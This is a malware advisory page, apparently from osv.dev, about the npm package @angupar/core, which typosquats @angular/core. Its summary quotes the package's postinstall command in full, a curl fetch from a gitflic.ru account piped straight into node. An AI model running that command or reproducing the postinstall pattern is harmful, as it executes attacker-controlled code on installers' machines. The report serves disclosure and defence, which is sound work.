@angupar/core@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17539
Ecosystem
npm
Summary
Package impersonates @angular/core (name @angupar/core, author field "angular", repository pointing at github.com/angular/angular, README copied from Angular). Its package.json postinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from a third-party user account (hellscripter on gitflic.ru) through a web.archive.org proxy and piping it directly to the installer's Node runtime. The fetch is unpinned, has no integrity check, and resolves to a host unrelated to the Angular project. npm install @angupar/core therefore yields arbitrary install-time code execution under attacker control, with the typosquat on @angular/core serving as the delivery lure.
Source: amazon-inspector (61d3f74118d7ca9e50d79028ad472e56f68c8f86111fb03973a0c01a00b4cd84)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.